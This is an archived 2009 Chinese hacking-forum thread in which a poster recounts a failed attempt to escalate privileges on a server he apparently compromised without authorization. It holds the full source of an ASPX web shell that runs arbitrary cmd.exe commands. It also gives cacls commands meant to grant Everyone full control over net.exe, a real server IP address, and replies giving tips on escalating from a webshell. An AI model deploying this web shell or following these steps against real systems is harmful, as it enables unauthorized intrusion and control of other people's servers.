【3.A.S.T】网络安全爱好者's Archiver

黑客学习

khjl1 发表于 2009-3-3 12:38

失败提权的笔记AND提权问题

本人失败的提权过程...都写出来了...希望哪位大牛一起来交流下...
wscript.shell √ 命令行执行组件   组建没被删...
自己上传了个CMD.exe  输入路径  但是都是没有权限.换了几个路径都一样
上传了个ASPX马  支持ASPX  但是没办法跳目录..
CMD.ASPX
代码如下
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>

<script runat="server">
protected void exec(object sender, EventArgs e)
{
    string item = cmd.Text;
    Process p = new Process();
    p.StartInfo.FileName = "cmd.exe";
    p.StartInfo.UseShellExecute = false;
    p.StartInfo.RedirectStandardInput = true;
    p.StartInfo.RedirectStandardOutput = true;
    p.StartInfo.RedirectStandardError = true;
    p.StartInfo.CreateNoWindow = true;
    string strOutput = null;
    p.Start();
    p.StandardInput.WriteLine(item);
    p.StandardInput.WriteLine("exit");
    strOutput = p.StandardOutput.ReadToEnd();
    p.WaitForExit();
    p.Close();
    Response.Write("<pre>");
    Response.Write(strOutput);
    Response.Write("</pre>");
}
    protected void Page_Load(object sender, EventArgs e)
    {
    }
</script>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="dir c:\" /><asp:Button id="btn"
runat="server" Text="execute" />
</form>

访问出错了...
接着换了个调用CMD.EXE执行命令的ASPX马
可以执行命令...
除了DIR  什么也执行不了 net net1 ipconfig netstat....都一样
所以自己上传了个NET.EXE和IPCONFIG.EXE NETSTAT.EXE
执行whoami
nt authority\network service
NET.EXE不能执行  其余的2个都能正常执行
还有一个麻烦的事
有一流监控
一流信息监控拦截系统提醒您:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词或
者您的IP受到了访问限制,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任
何违反国家规定的内容!本次拦截的相关信息为:
最开始也看了下FTP
Connected to 60.191.248.113.
220 Microsoft FTP Service
User (60.191.248.113:(none)):
这个没办法利用吧...

试了写个批处理和VBS
直接在CMD里执行   都执行不了
传了个狼牙写的无NET加用户
也加不上
dir C:\
发现有perl目录
记得看过利用perl来提权的教程..
但是后来发现里面是个空文件夹
perl提生权限..失败..
后来又试了下CACLS  想改变下目录的访问权限
输入
/c c:\var\cacls.exe C:\windows\system32\net.exe  /t /e /c /g everyone:f
被拦截了
/c c:\var\cacls C:\windows\system32\net.exe  /t /e /c /g everyone:f
成功执行
ACCESS_DENIED: C:\windows\system32\net.exe
试了下
/c C:\windows\system32\net.exe user
结果还是没有半点回显
又试了下
/C c:\var\cacls C:\windows\system32\net2.exe  /t /e /c /g everyone:f
没回显
那NET.EXE应该是存在才对的啊
但是为什么还是没办法呢
所以又去百度了下..
在一帖子中看到有人说运行CACLS得系统权限
也有人说回显是假的...一阵狂晕啊
因为没有利用CACLS提权过 所以不知道是真是假...
帖子地址:
[url=http://bbs.hackerxfiles.net/thread-90266-1-1.html]http://bbs.hackerxfiles.net/thread-90266-1-1.html[/url]
哪位知道怎么用CACLS来提权?该怎么提..需要什么权限?
或者还有什么别的提权方法...
说得够详细了吧  还有 上面有哪些地方错了 希望能指点下..因为本人提权很烂..希望能多学些提权方法..呵呵...
大牛们一起来讨论下吧...

3ast 发表于 2009-3-3 13:54

看的都晕了

koycon 发表于 2009-3-3 16:07

KH你怎么也在.....

wmmy 发表于 2009-3-4 13:44

服务器上设置的严格.  网上流传的常见提权方法都试过了吗?
主机是什么系统,开了哪些端口,上面又有哪些软件  估计单就从WEBSHELL提权很难  
综合这个主机来试试

个人意见` 看下楼  :lol

柔肠寸断 发表于 2009-3-5 19:12

回复 4楼 wmmy 的帖子

对,对于webshell提权很难的情况下可以看看主机自生的安全设置

当然,不是所有的主机都是可以成功的,如果不成功就不用再浪费时间了

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.